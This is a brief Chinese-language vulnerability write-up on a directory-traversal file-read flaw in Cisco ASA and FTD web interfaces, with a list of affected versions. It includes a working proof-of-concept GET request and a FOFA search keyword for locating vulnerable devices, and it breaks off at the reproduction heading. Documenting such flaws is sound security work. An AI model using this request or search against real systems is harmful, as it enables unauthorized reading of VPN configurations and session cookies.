1、漏洞描述
Cisco Adaptive Security Appliance (ASA) 防火牆設備以及Cisco Firepower Threat Defense (FTD)設備的WEB管理界面存在未授權的目錄穿越漏洞和遠程任意文件讀取漏洞,允許未經身份驗證的遠程攻擊者進行目錄遍歷攻擊並讀取目標系統上的敏感文件,此漏洞不能用於獲取對ASA或FTD系統文件或底層操作系統(OS)文件的訪問,所以只能讀取web系統目錄的文件,比如webvpn的配置文件、書簽、網絡cookies、部分網絡內容和超文本傳輸協議網址等信息。
該漏洞源於ASA和FTD的 web 服務接口在處理HTTP請求的URL時缺乏正確的輸入驗證,導致攻擊者可以在目標設備上查看系統內的任意文件。
注意:當設備配置了WebVPN或AnyConnect功能,啟用Web服務時,才會受到該漏洞影響,但是該漏洞不能用於訪問ASA或FTD系統文件或底層操作系統(OS)文件。
2、影響
Cisco ASA 設備影響版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
Cisco FTD設備影響版本:
6.2.2
6.2.3 < 6.2.3.16
6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1
6.4.0 < 6.4.0.9 + Hot Fix
6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)
6.6.0 < 6.6.0.1
3、復現
簡單記錄一下poc
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
fofa搜一下存在該漏洞的設備,關鍵字:
/+CSCOE+/
復現: